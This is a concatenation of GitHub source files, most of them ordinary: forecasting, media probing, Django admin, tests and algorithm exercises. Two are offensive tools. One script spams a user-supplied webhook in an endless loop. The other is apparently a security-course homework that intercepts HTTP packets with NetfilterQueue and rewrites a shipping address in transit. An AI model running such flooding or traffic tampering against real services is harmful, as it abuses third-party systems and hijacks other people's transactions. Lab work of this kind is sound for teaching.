fit_data[self.roles.get(\"datetime\")].dt.normalize().isin(self.holidays[\"datetime\"]).values\n y = fit_data[self.roles.get(\"value\")].values\n detrended = self.fit_trend_(y=y)\n\n # настроим сезонность\n self.fit_seasonal_(y=detrended, timeline=fit_data[self.roles.get(\"datetime\")])\n return\n \n def fit_trend_(self, y: np.ndarray) -> None:\n # инициализируем модель линейной регрессии\n self.lr = LinearRegression()\n x = self.trend_features_generation_()\n self.lr.fit(x[~self.discard_mask], y[~self.discard_mask])\n trend = self.lr.predict(x)\n\n if self.model_type == \"additive\":\n detrended = y - trend\n elif self.model_type == \"multiplicative\":\n detrended = y / trend\n else:\n raise ValueError(\"Wrong model type.\")\n \n return detrended\n \n def trend_features_generation_(self, horizon: int = None) -> np.ndarray:\n \"\"\"\n :param horizon: количество точек для прогнозирования (не дней)\n \"\"\"\n if horizon is None:\n x = np.reshape(range(self.h_size_items), newshape=(-1, 1))\n elif isinstance(horizon, int) and horizon > 0:\n x = np.reshape(range(horizon), newshape=(-1, 1))\n x += self.h_size_items\n else:\n raise ValueError(\"Wrong horizon value (has to be integer greater than 0)\")\n\n if self.trend == \"polynomial\":\n pf = PolynomialFeatures(degree=self.p_degree, include_bias=False)\n x = pf.fit_transform(x)\n \n return x\n \n def fit_seasonal_(self, y: np.ndarray, timeline: pd.Series) -> None:\n y_filtered = np.where(~self.discard_mask, y, np.nan)\n \n if isinstance(self.seasonal_type, int):\n sl = self.seasonal_type\n self.seasonal_groups = np.zeros(shape=(sl))\n elif isinstance(self.seasonal_type, str) and self.seasonal_type == \"weekly\":\n sl = 7 * 1440 // self.freq\n # считаем, 
что помимо недельной сезонности есть еще и дневная\n self.seasonal_groups = \\\n timeline.iloc[-1:-sl - 1:-1] \\\n .groupby(by=timeline.iloc[-1:-sl - 1:-1].dt.normalize()) \\\n .ngroup() \\\n .values\n elif isinstance(self.seasonal_type, str) and self.seasonal_type == \"daily\":\n sl = 1440 // self.freq\n self.seasonal_groups = np.zeros(shape=(sl))\n else:\n raise ValueError(\"Wrong seasonal component.\")\n \n if self.h_size_items % sl:\n self.seasonal = np.insert(arr=y_filtered.astype(\"float\"), obj=[0]*(sl - self.h_size_items % sl), values=np.nan)\n self.seasonal = np.reshape(self.seasonal, newshape=(sl, -1), order=\"F\")\n agg_f = getattr(np, \"nan\" + self.agg_f)\n else:\n self.seasonal = np.reshape(y_filtered, newshape=(sl, -1), order=\"F\")\n agg_f = getattr(np, \"nan\" + self.agg_f)\n \n self.seasonal = agg_f(self.seasonal, axis=1)\n return\n \n def predict(self, horizon: int = 1, py_data: pd.DataFrame = None) -> pd.DataFrame:\n \"\"\"\n :param horizon: горизонт прогнозирования (в днях)\n :param py_data:\n \"\"\"\n # время предсказания\n pred_from = self.predict_from\n pred_to = self.predict_from + pd.Timedelta(minutes=horizon*1440 - 1)\n pred_tl = pd.date_range(start=pred_from, \n end =pred_to, \n freq =\"%sT\" % self.freq)\n\n # предсказываем тренд\n trend = self.predict_trend_(horizon=horizon)\n\n # предсказываем сезонную компоненту\n seasonal = self.predict_seasonal_(seasonal_comp=self.seasonal, freq=self.freq, horizon=horizon)\n \n # скорректируем прогноз сезонной компоненты в соответстви�� с праздниками\n if py_data is not None and self.holidays is not None:\n # только те праздники, которые попадают в период прогнозирования\n filtered_holidays = \\\n self.holidays[self.holidays[\"datetime\"].between(left =pred_from,\n right=pred_to)]\n filtered_holidays = \\\n filtered_holidays.dropna(axis=0, subset=[\"Выходной / праздник\"], how=\"any\")\n\n # если какие-то праздики попадаю в указанных период, то корректируем сезонную компоненту для них\n if not filtered_holidays.empty:\n # настраиваем модель за предыдущий год и считаем прогноз\n py_train_data = py_data[:-1440*horizon//self.freq]\n self.py_model = TSModel(**self.__dict__)\n py_forecast = self.py_model.fit_predict(data=py_train_data, horizon=horizon)\n\n # определяем смещение дней недели в сезонной компоненте для прошлого года и для текущего\n shift = self.predict_from.weekday() - self.py_model.predict_from.weekday()\n LOGGER.debug(\"Смещение дней недели в сезонных компонентах прошлого года и текущего: %s\" % shift)\n\n # итерируемся по празникам\n for _, holiday in filtered_holidays.iterrows():\n # определяем дату праздника в прошлом году\n holiday_date = holiday[\"datetime\"]\n py_holiday_date = holiday_date - pd.DateOffset(years=1)\n LOGGER.debug(\"Праздничный день: %s\" % holiday_date)\n\n # рельные значения во время праздника в прошлом году\n py_holiday_mask = \\\n (py_forecast[self.roles.get(\"datetime\")].dt.normalize() == py_holiday_date).values\n py_holiday_actual = \\\n py_data.iloc[-1440*horizon//self.freq:].loc[py_holiday_mask, self.roles.get(\"value\")].values\n\n # удаляем тренд из реальных значений праздника в прошлом году\n py_trend = py_forecast.loc[py_holiday_mask, \"trend\"].values\n py_detrended = py_holiday_actual / py_trend\n\n # ищем ближайший день из сезонной компоненты для данного праздника в прошлом году\n sc = SymCalc(method=\"chi_square\")\n best_seasonal_idx = 0\n best_similarity = float(\"inf\")\n for seasonal_idx in np.unique(self.py_model.seasonal_groups):\n similarity = sc(p=py_detrended, 
q=self.py_model.seasonal[self.py_model.seasonal_groups == seasonal_idx])\n LOGGER.debug(\"Значение близости для дня с индексом {} из сезонной компоненты \" \\\n \"(прошлый год): {:.5f}\".format(seasonal_idx, similarity))\n \n if similarity < best_similarity:\n best_similarity = similarity\n best_seasonal_idx = seasonal_idx\n \n LOGGER.debug(\"Лучший день из сезонной компоненты в прошлом году: {} \" \\\n \"(значение близости: {:.5f})\".format(best_seasonal_idx, best_similarity))\n \n curr_idx = np.roll(np.unique(self.seasonal_groups), shift=-shift)[best_seasonal_idx]\n LOGGER.debug(\"Аналогичный день из сезонной компоненты в текущем году: %s\" % (curr_idx))\n\n # заменяем сезонную компоненту для праздника в текущем году\n curr_mask = (pred_tl.normalize() == holiday_date)\n seasonal[curr_mask] = self.seasonal[self.seasonal_groups == curr_idx]\n\n # определим скалирующий коэффициент и сгладим его\n if self.use_skaler:\n with np.errstate(divide='ignore', invalid='ignore'):\n scaler = py_detrended / self.py_model.seasonal[self.py_model.seasonal_groups == best_seasonal_idx]\n scaler = np.where(np.isfinite(scaler), scaler, 1)\n scaler = rolling(arr=scaler, window=self.scaler_window, agg_f=self.scaler_agg)\n seasonal[curr_mask] *= scaler\n \n # объединяем прогнозы компонент\n if self.model_type == \"additive\":\n forecast = seasonal + trend\n elif self.model_type == \"multiplicative\":\n forecast = seasonal * trend\n else:\n raise ValueError(\"Wrong model type.\")\n \n # Коррекция отрицательных значений (если такие имеются)\n if self.fix_negative:\n forecast = np.where(forecast >= 0, forecast, 0)\n \n results = pd.DataFrame(data={\"datetime\": pred_tl, \"forecast\": forecast, \"trend\": trend, \"seasonal\": seasonal})\n return results\n \n def predict_trend_(self, horizon: int = 1) -> np.ndarray:\n \"\"\"\n :param horizon: горизонт прогнозирования (в днях)\n \"\"\"\n x = self.trend_features_generation_(horizon=int(horizon * 1440 // self.freq))\n trend = self.lr.predict(x)\n return trend\n\n @staticmethod\n def predict_seasonal_(seasonal_comp: np.ndarray, horizon: int = 1, freq: int = 1) -> np.ndarray:\n \"\"\"\n :param horizon: горизонт прогнозирования (в днях)\n \"\"\"\n n_points = int(horizon*1440 // freq)\n if n_points > len(seasonal_comp):\n n_rep = n_points // len(seasonal_comp) + (1 if n_points % len(seasonal_comp) else 0)\n seasonal = np.tile(seasonal_comp, n_rep)[:n_points]\n else:\n seasonal = seasonal_comp[:n_points]\n return seasonal\n","repo_name":"JosephFrancisTribbiani/ds","sub_path":"Tasks/ts_foracasting_model/tsforecast/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":19422,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"40414449111","text":"import os\nimport subprocess\nimport json\n\ndef get_ffprobe_info(filepath):\n command = [\"ffprobe\", \"-v\", \"quiet\", \"-print_format\", \"json\", \"-show_format\", \"-show_streams\", filepath]\n ffprobe_process = subprocess.Popen(command, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE, universal_newlines=True)\n stdout, stderr = ffprobe_process.communicate()\n jsonout = json.loads(stdout)\n return jsonout\n\n#def should_convert(filepath):\ndef should_convert(ffprobe_json):\n result = True\n h264stream = False;\n aacstream = False;\n mp4File = False;\n large_resolution = False\n frame_rate_raw = 30\n\n fileExt = os.path.splitext(ffprobe_json[\"format\"][\"filename\"])[1]\n if fileExt == \".mp4\":\n file_streams = 
ffprobe_json[\"streams\"]\n file_format = ffprobe_json[\"format\"][\"format_long_name\"]\n mp4File = file_format == \"QuickTime / MOV\"\n if mp4File:\n for stream in file_streams:\n codec = stream[\"codec_name\"]\n if codec == \"h264\":\n h264stream = True\n frame_rate_raw = eval(stream[\"avg_frame_rate\"])\n if stream[\"width\"] > 1920 or stream[\"height\"] > 1080:\n large_resolution = True\n\n elif codec == \"aac\":\n aacstream = True\n\n if h264stream and aacstream:\n break\n\n bitrate = int(ffprobe_json[\"format\"][\"bit_rate\"])\n else:\n mp4File = False\n\n if mp4File and bitrate <= 1572864 and (h264stream and aacstream) and not large_resolution and (10 <= frame_rate_raw <= 30):\n #if mp4File and bitrate <= 3145728 and (h264stream and aacstream):\n result = False\n\n print(\"FINAL RESULT: {}\".format(result))\n return result\n\ndef get_duration(ffprobe_json):\n tmp_duration = ffprobe_json[\"format\"][\"duration\"]\n duration = int(float(tmp_duration)) if tmp_duration else 0\n return duration\n\ndef get_frame_rate(ffprobe_json):\n result = 30\n frame_rate_raw = \"\"\n for stream in ffprobe_json[\"streams\"]:\n if stream[\"codec_type\"] == \"video\":\n frame_rate_raw = stream[\"avg_frame_rate\"]\n\n if frame_rate_raw:\n result = eval(frame_rate_raw)\n break\n\n return result\n\n\n\ndef get_display_resolution(ffprobe_json):\n result = {\"width\": 0, \"height\": 0}\n for stream in ffprobe_json[\"streams\"]:\n if stream[\"codec_type\"] == \"video\":\n result[\"width\"] = int(stream[\"width\"])\n result[\"height\"] = int(stream[\"height\"])\n break\n\n return result\n\n","repo_name":"Ryochan7/testtube","sub_path":"videos/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2364,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"29543492075","text":"from django.contrib import admin\r\nfrom .models import *\r\n\r\nclass TrackInline(admin.TabularInline):\r\n model = Track\r\n fields = (\r\n 'track_number',\r\n 'title',\r\n 'collection',\r\n 'artist',\r\n 'is_remix',\r\n 'goodness',\r\n 'video_url',\r\n 'slug'\r\n )\r\n# Register your models here.\r\n@admin.register(Track)\r\nclass TrackAdmin(admin.ModelAdmin):\r\n list_display = (\r\n 'track_number',\r\n 'title',\r\n 'collection',\r\n 'artist',\r\n 'is_remix',\r\n 'duration',\r\n 'goodness',\r\n 'video_url',\r\n 'get_date',\r\n 'slug'\r\n )\r\n\r\n list_display_links = ('title',)\r\n\r\n list_editable = (\r\n 'track_number',\r\n 'collection',\r\n 'artist',\r\n 'is_remix',\r\n 'goodness',\r\n 'video_url',\r\n 'slug'\r\n )\r\n\r\n def get_date(self, obj):\r\n return obj.collection.date\r\n get_date.short_description = 'Date'\r\n get_date.admin_order_field = 'collection__date'\r\n\r\n list_filter = ('collection','artist','is_remix','collection','goodness', 'collection__kind')\r\n\r\n search_fields = ('collection','artist','title','video_url')\r\n\r\n prepopulated_fields = {'slug':('title',)}\r\n\r\n@admin.register(Collection)\r\nclass CollectionAdmin(admin.ModelAdmin):\r\n list_display = (\r\n 'title',\r\n 'kind',\r\n 'date',\r\n 'description_fr',\r\n 'description_en',\r\n 'cover_color',\r\n 'cover_accent_color',\r\n 'work_time',\r\n 'playlist_url',\r\n 'slug'\r\n )\r\n list_editable = (\r\n 'kind',\r\n 'work_time',\r\n 'playlist_url',\r\n 'slug'\r\n )\r\n\r\n inlines = [TrackInline,]\r\n\r\n list_filter = ('date','kind','work_time','cover_color')\r\n\r\n date_hierarchy = 'date'\r\n\r\n ordering = ('date',)\r\n\r\n search_fields = 
('title','kind','playlist_url','description_fr','description_en', 'cover_accent_color')\r\n\r\n prepopulated_fields = {'slug':('title',)}\r\n\r\n","repo_name":"ewen-lbh/portfolio-v2","sub_path":"music/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":1982,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"72667610186","text":"from __future__ import annotations\nfrom typing import Any\nfrom tests.dsdl import OUTPUT_DIR\nfrom tests.subprocess import execute_cli\n\n\ndef _unittest_subscribe(compiled_dsdl: Any) -> None:\n _ = compiled_dsdl\n env = {\n \"UAVCAN__LOOPBACK\": \"1\",\n \"UAVCAN__NODE__ID\": \"1234\",\n \"YAKUT_PATH\": str(OUTPUT_DIR),\n }\n # No subjects specified.\n _, _, stderr = execute_cli(\"-vv\", \"sub\", timeout=5.0, environment_variables=env)\n assert \"nothing to do\" in stderr.lower()\n assert \"no subject\" in stderr.lower()\n # Count zero.\n _, _, stderr = execute_cli(\n \"-vv\", \"sub\", \"4444:uavcan.si.unit.force.Scalar\", \"--count=0\", timeout=5.0, environment_variables=env\n )\n assert \"nothing to do\" in stderr.lower()\n assert \"count\" in stderr.lower()\n\n\ndef _unittest_dsdl_not_found() -> None:\n result, _, stderr = execute_cli(\n \"sub\",\n \"4444:uavcan.si.unit.force.Scalar\",\n timeout=5.0,\n ensure_success=False,\n environment_variables={\n \"UAVCAN__LOOPBACK\": \"1\",\n \"UAVCAN__NODE__ID\": \"1234\",\n },\n )\n assert result != 0\n assert \"yakut compile\" in stderr.lower()\n\n\ndef _unittest_transport_not_specified(compiled_dsdl: Any) -> None:\n _ = compiled_dsdl\n result, _, stderr = execute_cli(\n \"sub\",\n \"4444:uavcan.si.unit.force.Scalar\",\n timeout=5.0,\n ensure_success=False,\n environment_variables={\n \"YAKUT_PATH\": str(OUTPUT_DIR),\n },\n )\n assert result != 0\n assert \"transport\" in stderr.lower()\n","repo_name":"OpenCyphal/yakut","sub_path":"tests/cmd/subscribe.py","file_name":"subscribe.py","file_ext":"py","file_size_in_byte":1562,"program_lang":"python","lang":"en","doc_type":"code","stars":37,"dataset":"github-code","pt":"81"} +{"seq_id":"5925031061","text":"# 괄호 변환\n\ndef is_valid_bracket(s):\n stack = []\n for c in s:\n if c == \"(\":\n stack.append(c)\n else:\n if len(stack) == 0:\n return False\n else:\n if stack.pop() != \"(\":\n return False\n return len(stack) == 0\n\n\ndef solution(p):\n if is_valid_bracket(p):\n return p\n dic = {\"(\": 0, \")\": 0}\n for i in range(len(p)):\n dic[p[i]] += 1\n if dic[\"(\"] == dic[\")\"]:\n u, v = p[:i+1], p[i+1:]\n break\n if is_valid_bracket(u):\n return u + solution(v)\n else:\n new_u = \"\"\n for i in u[1:-1]:\n new_u += \")\" if i == \"(\" else \"(\"\n return \"(\" + solution(v) + \")\" + new_u\n","repo_name":"KimHS0915/programmers-learn-challenges","sub_path":"lv2/60058.py","file_name":"60058.py","file_ext":"py","file_size_in_byte":750,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"4653887701","text":"NUM_BUCKETS = 2003 # A prime number\n\nclass MyHashSet:\n\n def __init__(self):\n # Make the hash buckets.\n self.buckets = [[] for _ in range(NUM_BUCKETS)]\n\n def add(self, key: int) -> None:\n mod = key % NUM_BUCKETS\n if not key in self.buckets[mod]:\n self.buckets[mod].append(key)\n\n def remove(self, key: int) -> None:\n mod = key % NUM_BUCKETS\n # Remove if it's present\n try:\n self.buckets[mod].remove(key)\n except:\n pass\n \n def contains(self, key: int) -> bool:\n mod = key % NUM_BUCKETS\n return key in self.buckets[mod]\n \n 
\nclass MyHashSet:\n\n def __init__(self):\n self.array = []\n self.mapping = {}\n self.index = 0\n\n def add(self, key: int) -> None:\n if key not in self.mapping:\n self.mapping[key] = self.index\n self.array.append(key)\n self.index += 1\n\n def remove(self, key: int) -> None:\n if key in self.mapping:\n index = self.mapping[key]\n value = self.array[-1]\n remove_index = self.mapping[value]\n self.array[index], self.array[remove_index] = self.array[remove_index], self.array[index]\n self.mapping[value] = index\n self.mapping[key] = remove_index\n del self.mapping[key]\n self.index -= 1\n self.array.pop()\n\n def contains(self, key: int) -> bool:\n if key in self.mapping:\n return True\n return False\n\n\nclass MyHashSet:\n\n def __init__(self):\n self.array = []\n self.index = 0\n self.dict = {}\n\n def add(self, key: int) -> None:\n self.array.append(key)\n self.dict[key] = self.index\n self.index += 1\n \n\n def remove(self, key: int) -> None:\n if key in self.dict:\n cur_index = self.dict[key]\n temp = self.array[len(self.array) - 1]\n self.array[len(self.array) - 1] = key\n self.array[cur_index] = temp\n self.dict[temp] = cur_index\n del self.dict[key]\n self.array.pop()\n self.index -= 1\n \n\n def contains(self, key: int) -> bool:\n if key in self.dict:\n return True\n return False\n\n\n# Your MyHashSet object will be instantiated and called as such:\n# obj = MyHashSet()\n# obj.add(key)\n# obj.remove(key)\n# param_3 = obj.contains(key)\n","repo_name":"Xrenya/Algorithms","sub_path":"Leetcode/Python/_705.py","file_name":"_705.py","file_ext":"py","file_size_in_byte":2454,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"30547238768","text":"import json\r\nfrom urllib import request\r\nfrom urllib.error import HTTPError\r\n\r\n# Les paramètres d'en-tête de la requête\r\n\r\nheaders = {\r\n 'Content-Type': 'application/json',\r\n 'user-agent': 'Mozilla/5.0 (X11; U; Linux i686) Gecko/20071127 Firefox/2.0.0.11'\r\n}\r\n\r\n# Enfin on construit notre requête\r\n\r\nurl_webhooks = (input(\"Webhooks To Destroy : \"))\r\n\r\nword_spam = (input(\"Phrase ou mot à spam :\"))\r\n\r\npayload = {'content': f\"{word_spam}\"}\r\n\r\nr = request.Request(url = url_webhooks,\r\n data=json.dumps(payload).encode('utf-8'),\r\n headers=headers,\r\n method='POST')\r\n\r\n\r\ndef send_webhook():\r\n# Puis on l'émet !\r\n try:\r\n response = request.urlopen(r)\r\n print(response.status)\r\n print(response.reason)\r\n print(response.headers)\r\n except HTTPError as e:\r\n print('ERROR')\r\n print(e.reason)\r\n print(e.hdrs)\r\n print(e.file.read())\r\nwhile True:\r\n send_webhook()","repo_name":"Prize-app/Webhook-spam","sub_path":"Webhook.py","file_name":"Webhook.py","file_ext":"py","file_size_in_byte":990,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"39342008072","text":"import json\nimport os\nimport sqlite3\n\nfrom pathlib import Path\n\nimport logging\n\nlog = logging.getLogger(__name__)\n\nappnames = ['app1', 'app2', 'app3']\n\n\ndef test_root() -> Path:\n return Path(os.path.dirname(os.path.abspath(__file__)))\n\n\ndef get_demo_config():\n demo_config = Path(test_root() / Path('data/demo_config.json'))\n return json.loads(demo_config.read_text())\n\n\ndef app_sqlite_target(app_name: str) -> str:\n db_path = Path(test_root() / Path(\n f'data/lookups/{app_name}.unification_lookup.db'))\n return str(db_path.resolve())\n\n\ndef create_lookup_db(app_name: str):\n demo_config = 
get_demo_config()\n demo_apps = demo_config['demo_apps']\n app_conf = demo_apps[app_name]\n\n log.info(f'Create {app_name} Lookup')\n db_name = app_sqlite_target(app_name)\n\n log.info(f\"create db: {db_name}\")\n\n if os.path.exists(db_name):\n log.info(f\"{db_name} exists. Delete\")\n os.unlink(db_name)\n\n conn = sqlite3.connect(db_name)\n c = conn.cursor()\n\n c.execute('''CREATE TABLE lookup (native_id text, eos_account text)''')\n c.execute('''CREATE TABLE lookup_meta (native_table text, native_field text, field_type text)''')\n c.execute('''CREATE TABLE schema_map (sc_schema_pkey text, native_db text, native_db_platform text)''')\n c.execute('''CREATE TABLE table_maps (sc_schema_pkey text, sc_table_name text, real_table_name text, user_id_column text)''')\n\n c.execute(f\"INSERT INTO lookup_meta VALUES ('{app_conf['lookup']['lookup_meta']['native_table']}', \"\n f\"'{app_conf['lookup']['lookup_meta']['native_field']}', \"\n f\"'{app_conf['lookup']['lookup_meta']['field_type']}')\")\n\n for u in app_conf['lookup']['lookup_users']:\n c.execute(f\"INSERT INTO lookup VALUES ('{u['native_id']}', '{u['eos_account']}')\")\n\n for sc in app_conf['db_schemas']:\n c.execute(f\"INSERT INTO schema_map VALUES ('{sc['sc_schema_pkey']}', '{sc['database']}', '{sc['db_platform']}')\")\n\n for tm in sc['table_maps']:\n c.execute(\n f\"INSERT INTO table_maps VALUES ('{sc['sc_schema_pkey']}', '{tm['schema_table_id']}', \"\n f\"'{tm['db_table']}', '{tm['user_id_column']}')\")\n\n conn.commit()\n conn.close()\n\n\ndef configure_logging():\n log.setLevel(logging.DEBUG)\n ch = logging.StreamHandler()\n ch.setLevel(logging.DEBUG)\n formatter = logging.Formatter(\n '%(asctime)s - %(name)s - %(levelname)s - %(message)s')\n ch.setFormatter(formatter)\n log.addHandler(ch)\n\n\nif __name__ == \"__main__\":\n configure_logging()\n\n for app in appnames:\n create_lookup_db(app)\n","repo_name":"unification-com/haiku-node-prototype","sub_path":"test/create_lookups.py","file_name":"create_lookups.py","file_ext":"py","file_size_in_byte":2617,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"81"} +{"seq_id":"71799008265","text":"# Beecrowd 2322\n# Solução: Mariana Ramires\n\nn = int(input())\nsequencia = input().split()\nfalta = \"\"\n\nfor i in range(n):\n check = str(i+1)\n if check not in sequencia:\n falta = check\n\nprint(falta)","repo_name":"BRABianca/ALGPROG-I","sub_path":"ALGPROG-1/minimaratona/2322.pecaFalta.py","file_name":"2322.pecaFalta.py","file_ext":"py","file_size_in_byte":209,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"74693101705","text":"#!/usr/bin/env python3\n\"\"\"measure the total runtime and return it\"\"\"\nimport asyncio\n\n\nasync_comprehension = __import__('1-async_comprehension').async_comprehension\n\n\nasync def measure_runtime() -> float:\n \"\"\"measure the total runtime and return it\"\"\"\n start_time = asyncio.get_event_loop().time()\n\n tasks = [async_comprehension() for _ in range(4)]\n await asyncio.gather(*tasks)\n\n end_time = asyncio.get_event_loop().time()\n total_runtime = end_time - start_time\n\n return total_runtime\n","repo_name":"waley-code/alx-backend-python","sub_path":"0x02-python_async_comprehension/2-measure_runtime.py","file_name":"2-measure_runtime.py","file_ext":"py","file_size_in_byte":507,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"14640224961","text":"import sys\nfrom collections import 
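# A minimal sketch of the same INSERTs using sqlite3 "?" placeholders instead of
# f-strings, so a value containing a quote cannot break the statement.  The
# function name is illustrative; "conn" is assumed to be the sqlite3 connection
# created above and "users" the lookup_users list from the demo config.
def insert_lookup_rows(conn, users):
    c = conn.cursor()
    c.executemany("INSERT INTO lookup VALUES (?, ?)",
                  [(u["native_id"], u["eos_account"]) for u in users])
    conn.commit()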
defaultdict\n\ninput = sys.stdin.readline\nn, m, r = map(int, input().split())\ngraph = defaultdict(list)\nsys.setrecursionlimit(1000000)\n\nfor _ in range(m):\n a, b = map(int, input().split())\n graph[a].append(b)\n graph[b].append(a)\n\nfor i in range(n + 1):\n graph[i].sort()\n\nstack = [r]\nanswer = [0] * (n + 1)\ncount = 1\n\n\ndef dfs(answer, stack, count):\n if not stack:\n return\n pops = stack.pop()\n answer[pops] = count\n for v in graph[pops]:\n if not answer[v]:\n stack.append(v)\n dfs(answer, stack, count + 1)\n\n\ndfs(answer, stack, count)\nfor a in answer[1::]:\n print(a)\n\n\"\"\"\n5 5 1\n1 4\n1 2\n2 3\n2 4\n3 4\n\"\"\"\n","repo_name":"hugehoo/problem-solving","sub_path":"2022/2022-07/14JUL 24479.py","file_name":"14JUL 24479.py","file_ext":"py","file_size_in_byte":695,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"20338858067","text":"import random\n\ndef estimate_pi(n):\n inside_circle = 0\n for i in range(n):\n x = random.random()\n y = random.random()\n if x*x + y*y <= 1:\n inside_circle += 1\n \n pi_estimate = 4*inside_circle/n\n return pi_estimate\n\n# 使用10^6个点来估计圆周率\npi = estimate_pi(10**6)\nprint(f\"圆周率的估计值为: {pi:.2f}\")\n","repo_name":"nebnebuy/pyquitsolver","sub_path":"new2.py","file_name":"new2.py","file_ext":"py","file_size_in_byte":373,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"19755563841","text":"import itertools\nfrom sys import stdin\n\nn, m = map(int, stdin.readline().split())\ntemp_list = [[0 for _ in range(100)] for _ in range(100)]\nfor _ in range(n):\n x1, y1, x2, y2 = map(int, stdin.readline().split())\n for i, j in itertools.product(range(x1, x2+1), range(y1, y2+1)):\n temp_list[i-1][j-1] += 1\n\ncnt = 0\nfor i in range(100):\n for j in range(100):\n if temp_list[i][j] > m:\n cnt += 1\nprint(cnt)","repo_name":"kimjunsung04/baekjoon","sub_path":"06 Silver5/1531.py","file_name":"1531.py","file_ext":"py","file_size_in_byte":435,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"81"} +{"seq_id":"38029425348","text":"from netfilterqueue import NetfilterQueue\nfrom scapy.all import *\nfrom scapy.all import IP\nimport json\nimport requests\nimport sys\nimport base64\n\n\n'''\n################################################################################\n\nThis File script contains solutions to the\nHomework 1 which has 4 exercises.\n\nThe names of each function has corresponds to \nthe exercise number. 
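# A minimal reproducible variant of the Monte Carlo pi estimate above: seeding a
# private Random instance makes repeated runs return the same value, and the error
# of the estimate shrinks roughly like 1/sqrt(n).  Names here are illustrative.
import random

def estimate_pi_seeded(n, seed=0):
    rng = random.Random(seed)
    inside = sum(1 for _ in range(n)
                 if rng.random() ** 2 + rng.random() ** 2 <= 1)
    return 4 * inside / n

# estimate_pi_seeded(10**6) returns the same estimate on every run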
E .g\n\ndef ex3:\n\t\"This defines function to solve exercise3\"\n\n\nTo see the solution to each exercise , from the command\nline type:\n\n\t\t\t\t\t\tOR\n\t\tpython3 -c 'from interceptor import exercise3 ; exercise3()'\n\n\nwhere interceptor is the name of the file (ie this file) and exercise3 is the \nfunction that solves the corresponsing exercise of interest- in this case exercise 3.\n######################################################################################\n\n'''\n\n\n\ndef exercise3_call_back_function(pkt):\n\t'''\n\tThis function is used by the exercise 3 function below\n\tto get the ip packets from raw payload.\n\tThe exercise3 function recursively runs this function to solve \n\texercise 3\t\n\n\tInput : the intercepted raw payload\n\tOutput: The token and staus code\n\n\t'''\n\turl = 'http://com402.epfl.ch/hw1/ex3/shipping' # This is the url which we will use with request\n\n\tpkt.accept() # accept the packet (dont reject ot drop)\n\tpayload = pkt.get_payload() # get the payload and store in variable payload\n\tip = IP(payload) # create an IP packet from payload\n\n\n\tif ip.haslayer(TCP) == True and ip[TCP].dport == 80:\n\t\t\tassert ip[TCP].dport == 80\n\t\t\tif ip.haslayer(Raw):\n\t\t\t\t#print (ip[Raw])\n\t\t\t\thttp = ip[Raw].load.decode();\n\t\t\t\tif \"shipping\" in http:\n\t\t\t\t\tprint(\"yes\");\n\n\t\t\t\t\tdata_ = \"{\" + http.split(\"{\",1)[1] # split the payload anf extrat json.\n\t\t\t\t\t# This implies in the payload only the response starting with { is needed.\n\t\t\t\t\t# This will correspond to where the json file starts.\n\t\t\t\t\t# A \"{\" was added in the expression because when we split from \"{\" in the payload,\n\t\t\t\t\t# The bracelet \"{\"\" is excluded. But we need it to have a valid json format.\n\t\t\t\t\t# Hence, the need to add it back explicitly as \"{\" in the expression above\n\t\t\t\t\tdata = json.loads(data_) # load the new json file\n\n\t\t\t\t\tdata['shipping_address'] = 'lukman.olagoke@epfl.ch' # Here we replace the shipping address\n\n\t\t\t\t\theader = {\"User-Agent\":\"Dumb Generator\",\"Host\":\"com402.epfl.ch\",\"Content-Type\":\"application/json\",\"Content-Length\":\"91\"}\n\t\t\t\t\t# It is possible to extract the header too from payload but since the header from payload has no\n\t\t\t\t\t# \" \" double column , which is required for the request header format, this might amount to a for-loop computation\n\t\t\t\t\t# that might affect efficciency. The good thing is the header is not long so explicit declarationas above works well\n\t\t\t\t\t# to just construct a n\n\t\t\t\t\t#print (data) # Uncomment this to view data\n\n\t\t\t\t\t# Below we use the requests library to generate new packet, with the new json\n\t\t\t\t\tr = requests.post(url, data=json.dumps(data),headers=header)\n\t\t\t\t\t# The new json is response is provided as response below\n\t\t\t\t\tprint (\"The token response: \")\n\t\t\t\t\tprint (r.text)\n\t\t\t\t\t# We verify the status code is 200 = okay\n\t\t\t\t\tprint(\"\\n The status code: \")\n\t\t\t\t\tprint (r.status_code)\n\ndef exercise3():\n\n\t'''\n\tThis function recursively calls the exercise3_call_back_function.\n\tIt makes ise of the NetFilterQueue.\n\n\t'''\n\n\tnfqueue = NetfilterQueue() # create instance of NFQUEUE-- NetfilterQueue provides access to packets matched by an iptables rule in Linux\n\tnfqueue.bind(0, exercise3_call_back_function, 100) # bind nfqueue to function exercise3_call_back_function. 
